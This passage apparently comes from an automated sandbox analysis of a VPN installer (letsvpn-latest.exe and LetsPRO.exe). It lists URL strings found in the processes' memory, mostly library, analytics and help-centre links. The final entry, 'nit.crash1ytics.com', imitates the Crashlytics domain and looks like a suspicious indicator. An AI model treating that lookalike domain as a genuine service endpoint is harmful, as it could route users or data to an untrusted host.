              Source: LetsPRO.exe, 00000038.00000002.3942255684.00000000389FA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:51:0
              Source: LetsPRO.exe, 00000038.00000002.3942255684.00000000389FA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:51:0
              Source: letsvpn-latest.exe, 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid
              Source: LetsPRO.exe, 00000038.00000002.3996035893.0000000067F67000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/reference?client_type=gtag
              Source: LetsPRO.exe, 00000038.00000002.3996035893.0000000067F67000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/sending-events?client_type
              Source: LetsPRO.exe, 00000038.00000002.3996035893.0000000067F67000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/user-properties?client_typ
              Source: svchost.exe, 0000000C.00000003.2146208720.000001CF4D203000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 0000000C.00000003.2146208720.000001CF4D190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/WindowsCommunityToolkit
              Source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/WindowsCommunityToolkitO
              Source: letsvpn-latest.exe, 00000013.00000003.2326201013.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3922925338.0000000005F32000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://github.com/CommunityToolkit/dotnet
              Source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
              Source: powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: letsvpn-latest.exe, 00000013.00000003.2497867835.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2393362455.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2448705376.0000000002834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
              Source: letsvpn-latest.exe, 00000013.00000003.2497867835.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2393362455.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2448705376.0000000002834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
              Source: letsvpn-latest.exe, 00000013.00000003.2439763366.000000000283A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
              Source: letsvpn-latest.exe, 00000013.00000003.2439763366.000000000283A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
              Source: letsvpn-latest.exe, 00000013.00000003.2388837865.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2486397887.0000000002836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
              Source: letsvpn-latest.exe, 00000013.00000003.2388837865.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2486397887.0000000002836000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3923441295.0000000005FF6000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
              Source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7ee84596d92e178bce54c986df31ccc52479e772
              Source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7ee84596d92e178bce54c986df31ccc52479e7728
              Source: letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2425444699.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2427329081.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2467350670.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2399608066.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2410292995.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2389768364.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2480597366.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2471668940.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2363516673.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405800752.000000000283A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2481269690.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2482513419.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2485105994.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474107011.0000000002830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
              Source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime&
              Source: letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2477469430.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479437408.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2478798275.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2498550743.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2478147002.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/wcf
              Source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnetprojects/SVGImage
              Source: letsvpn-latest.exe, 00000013.00000003.2324359693.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/myuser/myrepo
              Source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms
              Source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms./logs?api-version=1.0.0
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2825583-killer-%E7%BD%91%E5%8D%A1%E9%9C%80%E8%A6%81%
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830282-%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D0%B8%D1%82%D
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%B
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2919829-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%BB%D1%83%
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2922442-%D1%87%D1%82%D0%BE-%D0%B4%D0%B5%D0%BB%D0%B0%
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2923401-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%B6%D0%B0%
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2925752-how-to-download-letsvpn
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926044-what-if-i-reached-maximum-connection-limit
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926062-recover-my-letsvpn-account
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3076586-ipv6-%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE%E9
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3083439-%d1%87%d1%82%d0%be-%d0%b4%d0%b5%d0%bb%d0%b0%
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3083562-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3130411-smartbyte-%E8%BD%AF%E4%BB%B6%E9%9C%80%E8%A6%
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3401886-special-settings-for-smartbyte
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3706909-%E8%B4%A6%E6%88%B7%E7%B3%BB%E7%BB%9F%E6%97%A
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710603-about-logging-in-out-anomalies
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710827-%D0%B7%D0%B0%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%D
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8259671-expressconnect-%E6%9C%8D%E5%8A%A1%E9%9C%80%E
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260054-killer-%E7%BD%91%E5%8D%A1%E6%9C%8D%E5%8A%A1%
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260070-intel-connectivity-service-%E9%9C%80%E8%A6%8
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260083-host-network-service-%E9%9C%80%E8%A6%81%E7%8
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262690-special-settings-for-intel-connectivity-serv
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262720-special-settings-for-host-network-service
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262786-special-settings-for-expressconnect
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262801-special-settings-for-killer-network-service
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262818-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262867-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262897-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262909-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263010-windows-%E5%A6%82%E4%BD%95%E6%B8%85%E7%90%86
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263068-how-to-delete-hosts-in-windows
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263093-%D0%BA%D0%B0%D0%BA-%D1%83%D0%B4%D0%B0%D0%BB%
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1627706-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C-%D1%
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1628560-help-documents
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/Killer
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://letsvpn.world/privacy.html
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://letsvpn.world/registerterm.html
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://letsvpn.world/terms.html
              Source: LetsPRO.exe, 00000038.00000002.3930288330.000000000F29A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/device
